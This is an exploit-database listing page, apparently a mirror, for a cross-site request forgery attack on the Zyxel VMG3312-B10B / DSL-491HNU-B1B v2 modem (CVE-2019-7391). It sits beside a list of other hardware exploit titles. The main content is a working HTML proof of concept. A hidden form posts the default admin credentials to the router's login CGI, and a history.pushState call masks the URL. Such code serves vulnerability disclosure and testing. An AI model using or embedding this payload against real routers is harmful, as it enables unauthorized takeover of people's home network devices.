Menu

Improved exploit search engine. Try it out

"Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery"

Author

"Yusuf Furkan"

Platform

hardware

Release date

2019-02-05

Release Date Title Type Platform Author
2019-04-22 "QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service" dos hardware "Dino Covotsos"
2019-04-17 "ASUS HG100 - Denial of Service" dos hardware "YinT Wang"
2019-04-16 "Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting" webapps hardware "Aaron Bishop"
2019-04-15 "Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-04-10 "D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting" webapps hardware "Semen Alexandrovich Lyhin"
2019-04-09 "TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow" remote hardware "Grzegorz Wypych"
2019-04-08 "SaLICru -SLC-20-cube3(5) - HTML Injection" webapps hardware Ramikan
2019-04-03 "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-04-02 "JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery" webapps hardware "Vikas Chaudhary"
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery" webapps hardware "Kumar Saurav"
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control" webapps hardware "Kumar Saurav"
2019-03-08 "Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)" local hardware Specter
2019-03-07 "QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)" remote hardware AkkuS
2019-03-04 "Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting" webapps hardware Tauco
2019-03-04 "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" webapps hardware JameelNabbo
2019-02-28 "Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow" dos hardware "Artem Metla"
2019-02-22 "Teracue ENC-400 - Command Injection / Missing Authentication" webapps hardware "Stephen Shkardoon"
2019-02-21 "MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass" remote hardware "Jacob Baines"
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting" webapps hardware "Ronnie T Baby"
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
Release Date Title Type Platform Author
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46326/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46326/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46326/40794/zyxel-vmg3312-b10b-dsl-491hnu-b1b-v2-modem-cross-site-request-forgery/download/", "exploit_id": "46326", "exploit_description": "\"Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery\"", "exploit_date": "2019-02-05", "exploit_author": "\"Yusuf Furkan\"", "exploit_type": "webapps", "exploit_platform": "hardware", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit
# Version: Zyxel VMG3312-B10B
# Tested on : Parrot Os
# Author: Yusuf Furkan
# Twitter: h1_yusuf
# CVE: CVE-2019-7391
# model name: DSL-491HNU-B1B v2

<html>
  <!-- CSRF PoC - generated by Yusuf -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/login/login-page.cgi" method="POST">
      <input type="hidden" name="AuthName" value="admin" />
      <input type="hidden" name="AuthPassword" value="1234" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>